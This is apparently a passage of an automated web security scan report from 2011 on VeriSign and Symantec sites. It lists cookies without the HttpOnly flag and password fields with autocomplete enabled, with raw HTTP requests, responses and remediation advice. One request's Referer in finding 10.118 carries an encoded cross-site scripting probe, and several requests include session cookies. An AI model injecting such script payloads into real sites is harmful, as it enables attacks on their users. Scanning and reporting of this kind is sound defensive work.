Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /assets/shared/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Set-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT
ETag: "2e58332-255-49a38c2aff480"
Accept-Ranges: bytes
Content-Length: 597
X-UA-Compatible: IE=EmulateIE7
Content-Type: image/gif

...[SNIP]...

10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /hp07/i/vlogo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp07/i/vlogo.gif HTTP/1.1
Host: www.verisign.co.uk
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:05 GMT
Server: Apache
Set-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT
ETag: "29480d7-13e4-4a01df4a82a80"
Accept-Ranges: bytes
Content-Length: 5092
Content-Type: image/gif

...[SNIP]...

10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

10.118. https://www4.symantec.com/Vrt/wl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www4.symantec.com
Path:   /Vrt/wl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1
Host: www4.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:34:28 GMT
Content-type: text/html
X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]
Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/
Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


11. Password field with autocomplete enabled
There are 43 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. http://blogs.verisign.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /?tid=footer HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 20:19:01 GMT
ETag: "1a606f6-9f7a-c8827740"
Accept-Ranges: bytes
Content-Length: 40826
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.4. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.8. https://knowledge.verisign.com/support/code-signing-support/index

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.9. https://knowledge.verisign.com/support/code-signing-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.10. https://knowledge.verisign.com/support/digital-id-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/digital-id-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.11. https://knowledge.verisign.com/support/eca-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/eca-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/eca-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 42730


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/mpki-for-ssl-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.14. https://knowledge.verisign.com/support/mpki-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 46210


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/trust-seal-support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.18. https://products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/logon.do

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

POST /geocenter/reseller/logon.do HTTP/1.1
Host: products.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false
Content-Length: 40
Cache-Control: max-age=0
Origin: https://knowledge.verisign.com
